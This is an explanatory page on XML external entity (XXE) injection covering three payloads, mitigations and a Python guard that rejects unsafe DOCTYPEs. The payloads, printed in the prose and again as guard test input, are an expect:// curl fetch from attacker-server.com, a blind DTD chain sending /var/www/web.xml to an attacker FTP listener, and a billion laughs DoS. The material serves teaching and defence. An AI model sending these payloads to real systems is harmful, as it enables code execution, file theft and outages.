XXEi

Exploitation vectors:

  1. RCE through the expect:// wrapper on a PHP server with the Expect extension installed. The URI may not contain spaces and the parser does not URL-decode encoded characters, so the shell variable $IFS (the internal field separator, which defaults to whitespace) is used as the delimiter between command arguments:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY file SYSTEM "expect://curl$IFS-O$IFS'attacker-server.com:8000/xxe.php'">
]>
<root>
<name>Joe</name>
<email>START_&file;_END</email>
</root>
  2. Blind (out-of-band) file exfiltration: the application reveals nothing in its response, so a parameter entity loads an attacker-hosted DTD, which defines an entity that sends the target file's contents to the attacker's FTP listener (the SSRF is the exfiltration channel):
<?xml version="1.0" ?>
<!DOCTYPE aaa [
    <!ENTITY % bbb SYSTEM "http://attacker-server.com:8090/xxe.dtd">
    %bbb;
    %ccc;
]>
<a>&eee;</a>

<!-- xxe.dtd -->
<!ENTITY % ddd SYSTEM "file:///var/www/web.xml"> 
<!ENTITY % ccc "<!ENTITY eee SYSTEM 'ftp://ATTACKERSERVER:2121/%ddd;'>">
  3. Classic billion laughs DoS: each entity references the previous one ten times, so &lol6; expands to 10^6 copies of "lol" from a payload of under 1 KB and exhausts the parser's memory or CPU:
<?xml version="1.0"?>
<!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ELEMENT lolz (#PCDATA)>
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<lolz>&lol6;</lolz>

Mitigation measures include:

  1. Disable XInclude processing.
  2. Disable resolution of external entities (the XXE primitive itself).
  3. Disable DTD processing altogether, or validate against an XSD schema instead of relying on a DTD.
  4. If the application speaks JSON, make sure its endpoints do not also accept XML: switching the Content-Type is a common way to reach a parser that was never meant to be exposed.
  5. Restrict the schemas that are accepted and limit what data is echoed back in the response to the client, so that a successful injection has less to read and less to exfiltrate.

For per-language mitigation guidance refer to the following resource: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html. For example, in .NET (including .NET 8) an XmlReaderSettings instance defaults to XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit and XmlReaderSettings.XmlResolver = null, so an XmlReader created from it rejects any DOCTYPE and never fetches external resources unless the caller explicitly opts in.
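The following is an added example, not code from the original page: a Python pre-parse guard that enforces mitigations 2 and 3 before the real parser touches untrusted input. It rejects any DOCTYPE by default; when a caller has to accept DTDs, it still refuses external (SYSTEM/PUBLIC) and parameter entities and computes the fully expanded size of every internal entity referenced in the body so that a billion laughs payload is rejected without ever being expanded. The three payloads above are embedded as constructed sample input; the limit of 100,000 bytes, the function names and the report layout are this example's own assumptions.

```python
"""Pre-parse guard for untrusted XML (example code, not from the page)."""
import re
import xml.etree.ElementTree as ET


class UnsafeXML(ValueError):
    """Raised when a document violates the hardening policy."""


_DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<pe>%\s+)?(?P<name>[A-Za-z_:][\w.:-]*)\s+"
    r"(?:(?P<ext>SYSTEM|PUBLIC)\b|\"(?P<dq>[^\"]*)\"|'(?P<sq>[^']*)')")
_REF_RE = re.compile(r"&([A-Za-z_:][\w.:-]*);")
_PREDEFINED = {"amp", "lt", "gt", "apos", "quot"}


def _split_doctype(xml_text):
    """Return (doctype_text, remaining_document). Quotes and [] nesting are
    tracked so a '>' inside an entity value or the internal subset does not
    terminate the DOCTYPE early."""
    m = _DOCTYPE_RE.search(xml_text)
    if not m:
        return None, xml_text
    quote, depth = None, 0
    for i in range(m.end(), len(xml_text)):
        ch = xml_text[i]
        if quote:
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
        elif ch == "[":
            depth += 1
        elif ch == "]":
            depth -= 1
        elif ch == ">" and depth == 0:
            return xml_text[m.start():i + 1], xml_text[:m.start()] + xml_text[i + 1:]
    raise UnsafeXML("unterminated DOCTYPE")


def _expanded_size(name, entities, memo, stack):
    """Bytes produced when &name; is fully expanded; recursion is an error."""
    if name in stack:
        raise UnsafeXML(f"recursive entity reference: {name}")
    if name in memo:
        return memo[name]
    value = entities.get(name)
    if value is None:  # undefined or external: expands to nothing locally
        return 0
    stack.add(name)
    size = len(value)
    for ref in _REF_RE.finditer(value):
        size += _expanded_size(ref.group(1), entities, memo, stack) - len(ref.group(0))
    stack.discard(name)
    memo[name] = size
    return size


def analyze(xml_text):
    """Summarise the DOCTYPE: external and parameter entities declared,
    undefined references in the body, and total internal expansion in bytes."""
    doctype, body = _split_doctype(xml_text)
    report = {"has_doctype": doctype is not None, "external": [],
              "parameter": [], "undefined": [], "expansion_bytes": 0}
    if doctype is None:
        return report
    internal = {}
    for m in _ENTITY_RE.finditer(doctype):
        name = m["name"]
        if m["pe"]:
            report["parameter"].append(name)
        if m["ext"]:
            report["external"].append(name)
        elif not m["pe"]:
            internal[name] = m["dq"] if m["dq"] is not None else m["sq"]
    memo = {}
    for ref in _REF_RE.finditer(body):
        name = ref.group(1)
        if name in internal:
            report["expansion_bytes"] += _expanded_size(name, internal, memo, set())
        elif name not in report["external"] and name not in _PREDEFINED:
            report["undefined"].append(name)
    return report


def safe_parse(xml_text, allow_dtd=False, max_expansion=100_000):
    """Default policy: no DOCTYPE at all. With allow_dtd=True, still refuse
    external and parameter entities and cap internal expansion (assumed limit)."""
    report = analyze(xml_text)
    if report["has_doctype"]:
        if not allow_dtd:
            raise UnsafeXML("DOCTYPE declarations are not accepted")
        if report["external"]:
            raise UnsafeXML(f"external entities declared: {report['external']}")
        if report["parameter"]:
            raise UnsafeXML(f"parameter entities declared: {report['parameter']}")
        if report["expansion_bytes"] > max_expansion:
            raise UnsafeXML(f"entity expansion of {report['expansion_bytes']} bytes")
    return ET.fromstring(xml_text)


def rejected(xml_text, **kwargs):
    """True if safe_parse refuses the document under the given policy."""
    try:
        safe_parse(xml_text, **kwargs)
    except UnsafeXML:
        return True
    return False


# Constructed sample input: the three payloads from this page.
EXPECT_RCE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY file SYSTEM "expect://curl$IFS-O$IFS'attacker-server.com:8000/xxe.php'">
]>
<root><name>Joe</name><email>START_&file;_END</email></root>"""

OOB_EXFIL = """<?xml version="1.0" ?>
<!DOCTYPE aaa [
    <!ENTITY % bbb SYSTEM "http://attacker-server.com:8090/xxe.dtd">
    %bbb;
    %ccc;
]>
<a>&eee;</a>"""


def billion_laughs(depth=6):
    """Build the page's lol1..lolN chain; depth=6 yields 10^6 copies of 'lol'."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        refs = f"&lol{i - 1 if i > 1 else ''};" * 10
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + f"\n]>\n<lolz>&lol{depth};</lolz>")


if __name__ == "__main__":
    for label, doc in (("expect", EXPECT_RCE), ("oob", OOB_EXFIL), ("lol", billion_laughs())):
        print(label, analyze(doc), "rejected:", rejected(doc, allow_dtd=True))
```

The guard is deliberately a separate layer: it is cheap, parser-independent, and fails closed on anything it cannot classify, so it complements (not replaces) turning off DTD and external-entity handling in the parser itself.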